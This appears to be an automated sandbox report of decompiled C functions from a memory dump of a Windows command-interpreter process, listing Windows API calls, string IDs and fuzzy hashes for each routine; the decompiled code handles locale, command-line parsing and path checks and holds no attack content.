                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 38%
                                    			E011E465D(void* __ecx) {
                                    				signed int _v8;
                                    				void* __esi;
                                    				signed int _t3;
                                    				int _t6;
                                    				struct HINSTANCE__* _t8;
                                    				void* _t10;
                                    				void* _t15;
                                    				void* _t16;
                                    				_Unknown_base(*)()* _t18;
                                    				void* _t19;
                                    				signed int _t20;
                                    
                                    				_push(__ecx);
                                    				_t3 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t3 ^ _t20;
                                    				_t18 =  *0x11fd5f8; // 0x0
                                    				if(_t18 != 0) {
                                    					L6:
                                    					 *0x12194b4(0);
                                    					_t6 =  *_t18();
                                    					L7:
                                    					_pop(_t19);
                                    					return E011E6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
                                    				}
                                    				_t8 =  *0x11fd0d0; // 0xffffffff
                                    				if(_t8 != 0xffffffff) {
                                    					L3:
                                    					if(_t8 != 0) {
                                    						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
                                    						 *0x11fd5f8 = _t18;
                                    					}
                                    					L5:
                                    					if(_t18 == 0) {
                                    						_t6 = SetThreadLocale(0x409);
                                    						goto L7;
                                    					}
                                    					goto L6;
                                    				}
                                    				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
                                    				_t18 =  *0x11fd5f8; // 0x0
                                    				 *0x11fd0d0 = _t8;
                                    				if(_t8 == 0xffffffff) {
                                    					goto L5;
                                    				}
                                    				goto L3;
                                    			}















                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1646373207-2530943252
                                    • Opcode ID: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                    • Instruction ID: 3b5fc911d88dba34504388ba82aaf093f55f1a55b3758242c60c83724ef66324
                                    • Opcode Fuzzy Hash: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                    • Instruction Fuzzy Hash: 6601A730940614DBCB3C9BA8B81CB693BE49B58A2DB05026DF936DB284CF705C819B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E011E1F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				wchar_t* _t92;
                                    				void* _t104;
                                    				void* _t108;
                                    				wchar_t* _t110;
                                    				wchar_t** _t111;
                                    				long _t117;
                                    				short* _t118;
                                    				void _t121;
                                    				void* _t123;
                                    				long _t128;
                                    				wchar_t* _t130;
                                    				wchar_t* _t137;
                                    				void* _t146;
                                    				wchar_t** _t155;
                                    				wchar_t** _t158;
                                    				void _t164;
                                    				wchar_t* _t168;
                                    				void _t171;
                                    				intOrPtr _t175;
                                    				long* _t180;
                                    				void* _t188;
                                    				signed int _t191;
                                    				void _t199;
                                    				void* _t203;
                                    				void* _t204;
                                    				wchar_t** _t205;
                                    				long* _t206;
                                    				void* _t207;
                                    				wchar_t* _t209;
                                    				long* _t217;
                                    				void _t218;
                                    				signed int _t220;
                                    				wchar_t* _t223;
                                    				void _t224;
                                    				wchar_t* _t225;
                                    				void* _t226;
                                    
                                    				_push(0xc0);
                                    				_push(0x11fbdb8);
                                    				E011E75CC(__ebx, __edi, __esi);
                                    				_t216 = __edx;
                                    				_t223 = __ecx;
                                    				 *(_t226 - 0xbc) = __ecx;
                                    				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
                                    				_t92 =  *(_t226 + 0xc);
                                    				 *(_t226 - 0xc0) = _t92;
                                    				 *(_t226 - 0xb8) = _t92;
                                    				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
                                    				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
                                    				memset(_t226 - 0xac, 0, 0x88);
                                    				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
                                    				_t155 =  *0x1213cc4;
                                    				_t155[0xc] = 0;
                                    				 *0x11fd0da = 0;
                                    				 *((intOrPtr*)(_t226 - 4)) = 0;
                                    				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
                                    				_push(0x3a);
                                    				if( *0x1213cc9 == 0) {
                                    					_pop(_t224);
                                    				} else {
                                    					_pop(_t224);
                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
                                    						 *(_t226 - 0xac) =  *(_t155[0x44]);
                                    					}
                                    				}
                                    				if(E011E7797(_t155) == 0) {
                                    					_t157 = 1;
                                    					goto L5;
                                    				} else {
                                    					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
                                    					_t146 =  *0x121c010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0x1213cc4)[0xc]), _t216, _t226 - 0xc8);
                                    					_t157 = 1;
                                    					if(_t146 == 1) {
                                    						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
                                    						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
                                    							_push(0);
                                    							_push(0x4ec);
                                    							E011DC5A2(1);
                                    							_t157 = 1;
                                    							__eflags = 1;
                                    						}
                                    						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
                                    						L35:
                                    						return E011E7614(0, _t216, _t224);
                                    					}
                                    					L5:
                                    					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
                                    					_t199 =  *(_t226 - 0xc0);
                                    					 *0x11fd0da = _t157;
                                    					_t158 =  *0x1213cc4;
                                    					_t158[2] = 0;
                                    					 *_t158 = _t216;
                                    					_t97 =  *(_t226 + 8);
                                    					_t158[1] =  *(_t226 + 8);
                                    					if( *0x1213cc9 == 0) {
                                    						L38:
                                    						__eflags = E011E2D22(_t216, _t97, _t199);
                                    						if(__eflags == 0) {
                                    							L8:
                                    							_t216 = 0x2000;
                                    							E011E2A7C(_t226 - 0xc0, 0x2000, _t235);
                                    							_t224 =  *(_t226 - 0xc0);
                                    							if(_t224 == 0) {
                                    								_push(0);
                                    								L47:
                                    								__imp__??_V@YAXPAX@Z();
                                    								L48:
                                    								goto L35;
                                    							}
                                    							E011E1040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
                                    							_t164 = _t224;
                                    							_t203 = _t164 + 2;
                                    							do {
                                    								_t104 =  *_t164;
                                    								_t164 = _t164 + 2;
                                    							} while (_t104 != 0);
                                    							_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
                                    							 *(_t226 - 0xb8) = _t168;
                                    							 *_t168 = 0;
                                    							_t106 =  *(_t226 - 0xbc);
                                    							if(( *(_t226 - 0xbc))[0xf] != 0) {
                                    								_t216 = 0x2000 - (_t168 - _t224 >> 1);
                                    								E011E1040(_t168, 0x2000, _t106[0xf]);
                                    							}
                                    							E011E2A06(( *0x1213cc4)[3], _t216);
                                    							_t171 = _t224;
                                    							_t204 = _t171 + 2;
                                    							do {
                                    								_t108 =  *_t171;
                                    								_t171 = _t171 + 2;
                                    							} while (_t108 != 0);
                                    							( *0x1213cc4)[0x19] = _t171 - _t204 >> 1;
                                    							_t110 = E011DDF40(_t224);
                                    							_t205 =  *0x1213cc4;
                                    							_t205[0xf] = _t110;
                                    							if(_t110 == 0) {
                                    								L49:
                                    								_push(_t224);
                                    								goto L47;
                                    							}
                                    							_t205[0x23] = _t110;
                                    							_t111 =  &(_t205[0x1a]);
                                    							_t175 = 9;
                                    							 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
                                    							do {
                                    								 *((intOrPtr*)(_t111 - 0x28)) = 0;
                                    								 *_t111 = 0;
                                    								_t111 =  &(_t111[1]);
                                    								_t175 = _t175 - 1;
                                    							} while (_t175 != 0);
                                    							_t216 =  *(_t226 - 0xb8);
                                    							if( *_t216 == 0) {
                                    								_t205[0xe] = 0;
                                    								_t205[0xd] = 0;
                                    								L34:
                                    								_t205[4] =  *0x1213cd8;
                                    								__imp__??_V@YAXPAX@Z(_t224);
                                    								goto L35;
                                    							}
                                    							_t206 = E011DDF40(_t216 + wcsspn(_t216, L" \t") * 2);
                                    							( *0x1213cc4)[0xd] = _t206;
                                    							if(_t206 == 0) {
                                    								goto L49;
                                    							}
                                    							_t180 = _t206;
                                    							_t56 =  &(_t180[0]); // 0x2
                                    							_t216 = _t56;
                                    							do {
                                    								_t117 =  *_t180;
                                    								_t180 =  &(_t180[0]);
                                    							} while (_t117 != 0);
                                    							_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
                                    							while(_t118 != _t206) {
                                    								_t191 =  *(_t118 - 2) & 0x0000ffff;
                                    								if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
                                    									_t118 = _t118 + 0xfffffffe;
                                    									continue;
                                    								} else {
                                    									break;
                                    								}
                                    							}
                                    							 *_t118 = 0;
                                    							if( *0x1213cc9 == 0) {
                                    								_t217 = ( *0x1213cc4)[0xd];
                                    								while(1) {
                                    									_t207 = 0x2f;
                                    									_t216 = E011DD7D4(_t217, _t207);
                                    									 *(_t226 - 0xb8) = _t216;
                                    									__eflags = _t216;
                                    									if(_t216 == 0) {
                                    										goto L27;
                                    									}
                                    									_t217 =  &(_t216[0]);
                                    									_t128 = towupper( *_t217 & 0x0000ffff);
                                    									__eflags = _t128 - 0x51;
                                    									if(_t128 != 0x51) {
                                    										continue;
                                    									}
                                    									 *0x11fd0c8 = 0;
                                    									_t190 =  *(_t226 - 0xb8);
                                    									_t209 =  *(_t226 - 0xb8);
                                    									 *(_t226 - 0xb8) =  &(_t209[0]);
                                    									do {
                                    										_t130 =  *_t209;
                                    										_t209 =  &(_t209[0]);
                                    										__eflags = _t130;
                                    									} while (_t130 != 0);
                                    									_t90 =  &(_t217[0]); // 0x0
                                    									E011E1040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
                                    									goto L27;
                                    								}
                                    							}
                                    							L27:
                                    							_t121 = E011DEA40(( *0x1213cc4)[0xd], 0, 0);
                                    							 *(_t226 - 0xc0) = _t121;
                                    							_t205 =  *0x1213cc4;
                                    							if( *_t121 == 0) {
                                    								L33:
                                    								_t205[0xe] = _t121;
                                    								goto L34;
                                    							}
                                    							_t216 =  &(_t205[0x1a]);
                                    							 *(_t226 - 0xbc) = _t216;
                                    							_t188 = 1;
                                    							while(_t188 < 0xa) {
                                    								 *(_t216 - 0x28) = _t121;
                                    								_t218 = _t121;
                                    								_t66 = _t218 + 2; // 0x2
                                    								 *(_t226 - 0xb8) = _t66;
                                    								do {
                                    									_t123 =  *_t218;
                                    									_t218 = _t218 + 2;
                                    								} while (_t123 != 0);
                                    								_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
                                    								 *( *(_t226 - 0xbc)) = _t220;
                                    								_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
                                    								 *(_t226 - 0xc0) = _t121;
                                    								_t188 = _t188 + 1;
                                    								_t216 =  &(( *(_t226 - 0xbc))[1]);
                                    								 *(_t226 - 0xbc) = _t216;
                                    								if( *_t121 != 0) {
                                    									continue;
                                    								}
                                    								goto L33;
                                    							}
                                    							goto L33;
                                    						}
                                    						goto L48;
                                    					}
                                    					_t137 =  *(_t226 - 0xbc);
                                    					_t235 =  *(_t137[0xe]) - _t224;
                                    					if( *(_t137[0xe]) != _t224) {
                                    						_t97 =  *(_t226 + 8);
                                    						goto L38;
                                    					}
                                    					_t225 = _t158[0x44];
                                    					E011E1040(_t216,  *(_t226 + 8),  *_t225);
                                    					( *0x1213cc4)[2] = _t225[2];
                                    					goto L8;
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011E1FA3
                                    • wcsspn.MSVCRT ref: 011E2181
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2278
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                    • String ID:
                                    • API String ID: 1535828850-0
                                    • Opcode ID: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                    • Instruction ID: d3a4a764105d28c0265579dc273ab993552439345fa951b2646c1cd28c9dcc11
                                    • Opcode Fuzzy Hash: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                    • Instruction Fuzzy Hash: A1C19E75A00605CFDB29DFA8D898BA9B7F6BF54304F14819DD50A9B394DB309A82CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E011E3B5D(signed short* __ecx, int __edx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				void* _v28;
                                    				void _v548;
                                    				WCHAR* _v552;
                                    				signed int _v556;
                                    				signed short* _v560;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t31;
                                    				int _t46;
                                    				signed int _t52;
                                    				signed short* _t58;
                                    				signed int _t59;
                                    				intOrPtr _t63;
                                    				signed short* _t65;
                                    				void* _t77;
                                    				signed short* _t78;
                                    				void* _t79;
                                    				signed short* _t84;
                                    				signed short** _t87;
                                    				signed int _t88;
                                    
                                    				_t82 = __edx;
                                    				_t31 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t31 ^ _t88;
                                    				_v24 = 1;
                                    				_t65 = 0;
                                    				_v20 = 0x104;
                                    				_v28 = 0;
                                    				_t84 = __ecx;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L18:
                                    					_t87 = 1;
                                    				} else {
                                    					0xffce = 0x24;
                                    					_t87 = E011E00B0(0xffce);
                                    					if(_t87 == 0) {
                                    						L22:
                                    						E011F9287(0xffce);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						goto L23;
                                    					} else {
                                    						 *_t87 = _t84;
                                    						E011DC923(_t87);
                                    						_t84 = _t87[3];
                                    						_v560 = _t87[6];
                                    						_v552 =  *_t87;
                                    						_t63 = E011E00B0(0xffce);
                                    						if(_t63 == 0) {
                                    							goto L22;
                                    						} else {
                                    							 *0x1213cec = _t63;
                                    							E011E36CB(0, _t63, 0x7fe7, 0);
                                    							_t72 = _v28;
                                    							if(_v28 == 0) {
                                    								L23:
                                    								_t72 =  &_v548;
                                    							}
                                    						}
                                    					}
                                    					_t82 = _v20;
                                    					if(E011E2D22(_t72, _v20, _v552) != 0) {
                                    						goto L18;
                                    					} else {
                                    						_t73 = _v28;
                                    						if(_v28 == 0) {
                                    							_t73 =  &_v548;
                                    						}
                                    						_t46 = 0x5c;
                                    						_t82 = _t46;
                                    						 *((short*)(E011E2349(_t73, _t46) + 2)) = 0;
                                    						_t48 = _v28;
                                    						if(_v28 == 0) {
                                    							_t48 =  &_v548;
                                    						}
                                    						E011E0D89(_t82, _t48);
                                    						if(_t84 == 0) {
                                    							L20:
                                    							E011DC923(_t87);
                                    							_t87[6] = _v560;
                                    						} else {
                                    							_t52 =  *_t84 & 0x0000ffff;
                                    							_t82 = 0x3a;
                                    							if(_t52 == _t82) {
                                    								goto L20;
                                    							} else {
                                    								_t77 = 0x5c;
                                    								if(_t52 == _t77) {
                                    									_t58 = _v552;
                                    									if(_t84 == _t58) {
                                    										L21:
                                    										_t84 =  &(_t84[1]);
                                    									} else {
                                    										while( *_t58 != _t65) {
                                    											_t78 = _t58;
                                    											_t58 =  &(_t58[1]);
                                    											if(_t58 != _t84) {
                                    												continue;
                                    											}
                                    											L13:
                                    											_t59 =  *_t78 & 0x0000ffff;
                                    											if(_t59 == _t82) {
                                    												goto L21;
                                    											} else {
                                    												_t79 = 0x5c;
                                    												if(_t59 == _t79) {
                                    													goto L21;
                                    												}
                                    											}
                                    											goto L15;
                                    										}
                                    										_t78 = _t65;
                                    										goto L13;
                                    									}
                                    								}
                                    								L15:
                                    								_v556 =  *_t84 & 0x0000ffff;
                                    								 *_t84 = 0;
                                    								if(GetFileAttributesW(_v552) == 0xffffffff) {
                                    									_t65 = GetLastError();
                                    								}
                                    								 *0x1213cf0 = _t65;
                                    								 *_t84 = _v556;
                                    								if( *0x1213cf0 == 0) {
                                    									goto L20;
                                    								} else {
                                    									goto L18;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
                                    			}


                                    APIs
                                    • memset.MSVCRT ref: 011E3B91
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3CF6
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,-00000001,00000000,?,00000000), ref: 011EE015
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9CF
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9E5
                                      • Part of subcall function 011DC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                      • Part of subcall function 011DC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 011E3CC5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E3CD0
                                      • Part of subcall function 011E2349: wcsrchr.MSVCRT ref: 011E234F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                    • String ID:
                                    • API String ID: 3402406610-0
                                    • Opcode ID: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                    • Instruction ID: ae59b34ea5c5032b665c0d0424968dee3e3e5ff6580ad2d72d3ef3260354f571
                                    • Opcode Fuzzy Hash: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                    • Instruction Fuzzy Hash: 9C51B331A006169BDB3CDBE9A84C67EBBF5FF58714F54046AE919D7280EB30C980CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 66%
                                    			E011DB710(intOrPtr _a4) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				int _v556;
                                    				char _v560;
                                    				int _v564;
                                    				void _v1084;
                                    				int _v1088;
                                    				intOrPtr _v1092;
                                    				void* _v1096;
                                    				char _v1100;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t41;
                                    				intOrPtr _t43;
                                    				int _t46;
                                    				char _t67;
                                    				signed int _t85;
                                    
                                    				_t41 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t41 ^ _t85;
                                    				_t43 = _a4;
                                    				_t84 = 0;
                                    				_v1092 = _t43;
                                    				_push(0);
                                    				_push(0x120b8f8);
                                    				L011E82C1();
                                    				_t67 = 1;
                                    				if(_t43 != 0) {
                                    					 *0x120b8b0 = 1;
                                    					L12:
                                    					return E011E6FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
                                    				}
                                    				if( *0x1213ccc == 0) {
                                    					if( *0x1218058 != 0) {
                                    						goto L2;
                                    					}
                                    					_t46 = 1;
                                    					if( *0x1213cc4 == 0) {
                                    						L3:
                                    						_v1088 = _t46;
                                    						_v564 = _t84;
                                    						_v560 = _t67;
                                    						_v556 = 0x104;
                                    						memset( &_v1084, _t84, 0x104);
                                    						_v28 = _t84;
                                    						_v24 = _t67;
                                    						_v20 = 0x104;
                                    						memset( &_v548, _t84, 0x104);
                                    						_t84 = 0x7ee3;
                                    						if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
                                    							_t63 = _v28;
                                    							if(_v28 == 0) {
                                    								_t63 =  &_v548;
                                    							}
                                    							_t76 = _v564;
                                    							if(_v564 == 0) {
                                    								_t76 =  &_v1084;
                                    							}
                                    							_t79 =  &_v1088;
                                    							_t67 = E011E5FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
                                    							if(_t67 == 0) {
                                    								if(_v28 == 0) {
                                    									_t79 =  &_v548;
                                    								}
                                    								_t78 = _v564;
                                    								if(_v564 == 0) {
                                    									_t78 =  &_v1084;
                                    								}
                                    								_t67 = E011DB97C(_t78, _t79, _v1088, _v1100, _v1096);
                                    							}
                                    						}
                                    						 *0x120b8b0 = _t67;
                                    						__imp__??_V@YAXPAX@Z(_v28);
                                    						__imp__??_V@YAXPAX@Z(_v564);
                                    						goto L12;
                                    					}
                                    				}
                                    				L2:
                                    				_t46 = _t84;
                                    				goto L3;
                                    			}


                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$_setjmp3
                                    • String ID:
                                    • API String ID: 4215035025-0
                                    • Opcode ID: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                    • Instruction ID: 3f139567240e9f0b455cbc1c4d7c3ad1a7aa79a9b5a0e0ac35a533ea88d43fc1
                                    • Opcode Fuzzy Hash: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                    • Instruction Fuzzy Hash: 6A41B271E052299FDF29CAA5DC88AEEBBB4FB45304F0401ADE609A3140DB309A84CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E011F8F66(void* __ecx, int __edx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				int _v556;
                                    				char _v560;
                                    				void* _v564;
                                    				void _v1084;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t31;
                                    				signed int _t55;
                                    				int _t56;
                                    				void* _t66;
                                    				void* _t70;
                                    				int _t71;
                                    				signed int _t74;
                                    
                                    				_t69 = __edx;
                                    				_t31 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t31 ^ _t74;
                                    				_v560 = 1;
                                    				_t71 = 0;
                                    				_v556 = 0x104;
                                    				_v564 = 0;
                                    				_t56 = __edx;
                                    				_t70 = __ecx;
                                    				memset( &_v1084, 0, 0x104);
                                    				_v28 = 0;
                                    				_v24 = 1;
                                    				_v20 = 0x104;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
                                    					L13:
                                    					__imp__??_V@YAXPAX@Z(_v28);
                                    					__imp__??_V@YAXPAX@Z();
                                    					return E011E6FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
                                    				} else {
                                    					_t64 = _v564;
                                    					if(_v564 == 0) {
                                    						_t64 =  &_v1084;
                                    					}
                                    					_t69 = _v556;
                                    					if(E011E2D22(_t64, _v556, _t70) == 0) {
                                    						_t65 = _v28;
                                    						if(_v28 == 0) {
                                    							_t65 =  &_v548;
                                    						}
                                    						_t69 = _v20;
                                    						if(E011E2D22(_t65, _v20, _t56) == 0) {
                                    							_t55 = _v28;
                                    							if(_t55 == 0) {
                                    								_t55 =  &_v548;
                                    							}
                                    							_t66 = _v564;
                                    							if(_t66 == 0) {
                                    								_t66 =  &_v1084;
                                    							}
                                    							__imp___wcsicmp(_t66, _t55);
                                    							asm("sbb esi, esi");
                                    							_t71 =  ~_t55 + 1;
                                    						}
                                    					}
                                    					goto L13;
                                    				}
                                    			}


                                    APIs
                                    • memset.MSVCRT ref: 011F8FA5
                                    • memset.MSVCRT ref: 011F8FC5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcsicmp.MSVCRT ref: 011F9073
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9085
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9092
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$_wcsicmp
                                    • String ID:
                                    • API String ID: 1670951261-0
                                    • Opcode ID: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                    • Instruction ID: 24969437e27e406e2c8bd999c452609998dcf48dbfd9787ffe554203ceaac5a3
                                    • Opcode Fuzzy Hash: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
